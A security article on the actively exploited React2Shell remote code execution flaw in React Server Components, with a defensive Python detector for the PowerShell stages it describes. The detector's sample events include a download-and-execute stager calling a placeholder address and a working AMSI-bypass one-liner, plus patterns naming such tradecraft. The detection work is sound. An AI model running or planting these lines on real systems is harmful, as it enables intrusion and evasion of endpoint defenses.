React2Shell RCE Vulnerability: Exploited in the Wild! What You Need to Know (2026)

A critical remote code execution vulnerability in React Server Components, dubbed React2Shell and tracked as CVE-2025-55182, is being actively exploited in the wild. It affects React and the frameworks built on it, Next.js included.

GreyNoise researchers have observed a widespread, largely automated exploitation campaign targeting a deserialization flaw in the React Server Components Flight protocol. The flaw lets a remote attacker execute arbitrary code on the server without authentication, which makes every exposed deployment a target.

The attack pattern is telling. Exploitation traffic comes from both newly seen and previously known attacker infrastructure, and automated traffic dominates. The exploit has already been folded into Mirai variants and other botnet kits, which points to an organized, tooled-up campaign rather than opportunistic one-off attempts.

The attack chain starts with initial access attempts built on publicly available proof-of-concept code. The payloads are multi-stage: the first stage runs a trivial PowerShell arithmetic expression whose result in the response confirms that code execution was achieved, and later stages deliver encoded PowerShell stagers that use obfuscation and bypass techniques to evade Windows security controls.

Traffic analysis shows a mix of user agents: Go-http-client, Assetnote scanners, and mainstream browser strings such as Chrome and Safari. That composition is typical of the early exploitation window, when researchers, scanners, and tools spoofing browser user agents all arrive at once.

Source IPs are concentrated in a few regions, and nearly half of the malicious IPs were first observed in December 2025. GreyNoise publishes the observed IPs under its React Server Components template so that defenders can block them proactively.

Mitigation starts with patching: upgrade vulnerable React Server Components packages and Next.js deployments to fixed versions. On the endpoint, alert on PowerShell processes launched with encoded commands or suspicious functions, and on script blocks that attempt to bypass Windows AMSI. Repeated trivial PowerShell arithmetic expressions on a web server host are also a strong indicator of exploitation attempts, since that is how attackers confirm code execution before dropping a stager.
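As an added example that is not part of the article or of GreyNoise's published material, the following Python implements the endpoint detection logic just described over constructed sample events: it decodes -EncodedCommand payloads, flags script bodies that consist of nothing but arithmetic, matches common AMSI-bypass strings and download-and-execute helpers, and escalates when a single host shows repeated arithmetic probes. The hostnames, the 203.0.113.5 address, the log records and the regex patterns are my own assumptions about what this tradecraft looks like, not indicators taken from the report.

```python
"""Endpoint-side detection for the PowerShell stages described above.

Added example; the sample events, hosts and the 203.0.113.5 address are
constructed, and the patterns are assumptions rather than published IOCs.
"""
import base64
import re
from collections import Counter

# -EncodedCommand and its short aliases, followed by a Base64 blob.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Inline script passed with -Command / -c in double quotes.
INLINE_COMMAND = re.compile(r'-(?:c|command)\s+"([^"]*)"', re.IGNORECASE)
# A script body that is nothing but integer arithmetic, e.g. 1337*2.
ARITHMETIC_ONLY = re.compile(r"\(?\s*\d+(?:\s*[-+*/%]\s*\d+)+\s*\)?")
# Strings seen in common AMSI bypass one-liners (assumed patterns).
AMSI_BYPASS = re.compile(
    r"amsiutils|amsiinitfailed|amsiscanbuffer|amsi\.dll", re.IGNORECASE)
# Download-and-execute helpers typical of stagers (assumed patterns).
SUSPICIOUS_FUNCS = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|"
    r"invoke-webrequest|\biwr\b|frombase64string", re.IGNORECASE)


def encode_ps(script):
    """Encode a script the way -EncodedCommand expects (UTF-16LE, Base64).
    Used here only to build a realistic sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand body, or None if the command line
    has none or the blob is not valid Base64 / UTF-16LE."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(source, text):
    """Classify one event. source is 'cmdline' (process creation command
    line) or 'scriptblock' (PowerShell script block text)."""
    findings = set()
    body = text
    if source == "cmdline":
        decoded = decode_encoded_command(text)
        if decoded is not None:
            findings.add("encoded_command")
            body = decoded            # inspect the decoded script, not the blob
        else:
            inline = INLINE_COMMAND.search(text)
            if inline:
                body = inline.group(1)
    if ARITHMETIC_ONLY.fullmatch(body.strip()):
        findings.add("arithmetic_probe")
    if AMSI_BYPASS.search(body):
        findings.add("amsi_bypass")
    if SUSPICIOUS_FUNCS.search(body):
        findings.add("suspicious_function")
    return findings


def triage(events, arithmetic_threshold=2):
    """Return (host, sorted findings) for each suspicious event. Repeated
    arithmetic probes on one host escalate to a stronger indicator."""
    alerts = []
    probes = Counter()
    for host, source, text in events:
        findings = analyze_event(source, text)
        if "arithmetic_probe" in findings:
            probes[host] += 1
            if probes[host] >= arithmetic_threshold:
                findings.add("repeated_arithmetic_probe")
        if findings:
            alerts.append((host, sorted(findings)))
    return alerts


# Constructed sample events: (host, source, text).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s2.ps1')"
SAMPLE_EVENTS = [
    ("web01", "cmdline", 'powershell.exe -NoProfile -Command "1337*2"'),
    ("web01", "cmdline", 'powershell.exe -NoProfile -Command "4242+1"'),
    ("web01", "cmdline", "powershell.exe -nop -w hidden -enc " + encode_ps(STAGER)),
    ("web01", "scriptblock",
     "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
     ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"),
    ("web02", "cmdline", 'powershell.exe -Command "Get-ChildItem C:\\inetpub"'),
]

if __name__ == "__main__":
    for host, findings in triage(SAMPLE_EVENTS):
        print(host, ", ".join(findings))
```

Feeding real Sysmon process-creation command lines and PowerShell script block (event 4104) text into triage() in the same (host, source, text) shape is enough to reproduce this on live data; the arithmetic threshold is deliberately low because benign automation rarely spawns PowerShell just to evaluate an expression.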

Author: Geoffrey Lueilwitz